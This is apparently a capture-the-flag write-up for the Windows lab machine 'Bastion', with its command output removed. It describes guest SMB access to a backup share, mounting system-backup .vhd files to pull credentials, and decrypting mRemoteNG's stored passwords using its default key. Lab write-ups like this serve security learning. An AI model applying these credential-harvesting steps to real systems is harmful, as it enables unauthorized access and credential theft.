Bastion is a simple Windows machine that involves Windows backups and bad tools configurations.
As always, let’s run a port scan using our trusty nmap:
Samba let’s us authenticate as guest user, let’s check what’s on it:
smbclient takes the user password after the
% symbol, but with
guest user no password is needed.
Let’s mount the
Backups share and explore it:
The share contains a folder named WindowsImageBackup, which is created by
Windows backup utility. The backups are contained in
.vhd (virtual hard disk)
files. After installing the software that allows us to mount those files
(sudo apt install libguestfs-tools) let’s search them:
There are two .vhd files. Let’s mount them:
The first drive
(9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd) is the backup of the
boot partition and it doesn’t contain anything useful.
Mounting the second drive
(9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd), we find
out that it’s the backup of the entire system:
Let’s ssh into the box and get the flag:
After exploring the file system, we find a recently installed program called mRemoteNG, which is used to manage remote connections.
A quick Google search tells us that this program saves the connections passwords
in a configuration file in
%APPDATA% and encrypts them with AES using the MD5
hash of the string “mR3m” as key. Let’s search the configuration file:
After printing the file content with the command
type confCons.xml we find the
Let’s use a tool to decrypt the password:
Let’s ssh into the box as
administrator and get the flag: